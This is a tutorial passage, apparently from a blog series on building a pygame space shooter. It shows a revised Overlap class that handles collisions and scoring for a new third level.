We also need to edit the Overlap class, which will now take level three into consideration.

from pygame.locals import *

class Overlap(object):

    def __init__(self):
        pass  # nothing here

    # is the player overlapping an enemy, a player missile or an enemy missile?
    def isOverlap(self, player, em, ex, score, gm):
        self.checkOverlap(em.enemy_list, player, ex, gm, score, em.width, em.height,
                          em.enemy_missile_manager.width, em.enemy_missile_manager.height, None)
        if gm.level_manager.get_level() == 3:
            self.checkOverlap(em.horizontal_enemy_list, player, ex, gm, score, em.width1, em.height1,
                              em.enemy_missile_manager.width, em.enemy_missile_manager.height,
                              gm.level_manager.get_level())

    def checkOverlap(self, e_list, player, ex, gm, score, width, height, m_width, m_height, level):
        self.player_rect = Rect(player.pos.x, player.pos.y, player.width, player.height)
        for i in range(len(e_list)):  # does the player collide with an enemy?
            self.em_rect = Rect(e_list[i].x, e_list[i].y, width, height)
            if self.player_rect.colliderect(self.em_rect):
                e_list[i].on = False
                if not e_list[i].hit:
                    ex.create_explosion(player.pos.x + 2, player.pos.y + 2)
                    e_list[i].hit = True
                gm.state = gm.OVER
                gm.setup(gm.level_manager.get_level())
        for i in range(len(e_list)):  # does an enemy missile hit the player?
            for j in range(len(e_list[i].missile_list)):
                self.em_rect = Rect(e_list[i].missile_list[j].x, e_list[i].missile_list[j].y,
                                    m_width, m_height)
                if self.player_rect.colliderect(self.em_rect):
                    e_list[i].missile_list[j].on = False
                    ex.create_explosion(player.pos.x + 2, player.pos.y + 2)
                    score.set_score(-1)
                    if score.score < 0:
                        gm.state = gm.OVER
                        gm.setup(gm.level_manager.get_level())
        for i in range(len(e_list)):  # does a player missile hit an enemy?
            self.em_rect = Rect(e_list[i].x, e_list[i].y, width, height)
            for j in range(len(player.getMissileManager().missile_list)):
                self.mm_rect = Rect(player.getMissileManager().missile_list[j].x,
                                    player.getMissileManager().missile_list[j].y,
                                    player.getMissileManager().width,
                                    player.getMissileManager().height)
                if self.em_rect.colliderect(self.mm_rect):
                    e_list[i].on = False
                    player.getMissileManager().missile_list[j].on = False
                    if not e_list[i].hit:
                        ex.create_explosion(e_list[i].x, e_list[i].y + 2)
                        e_list[i].hit = True
                        if level == 3:
                            score.set_score(10)
                        else:
                            score.set_score(1)
                    if score.score >= gm.level_manager.get_level() * 30:
                        gm.level_manager.increase_level()

Here is what level 3 looks like.

http://gamingdirectional.com/wp-content/uploads/2018/12/game_strike-4.mp4

Now we have concluded the game-level related topics; we will create the about scene and the credit scene in the next chapter.
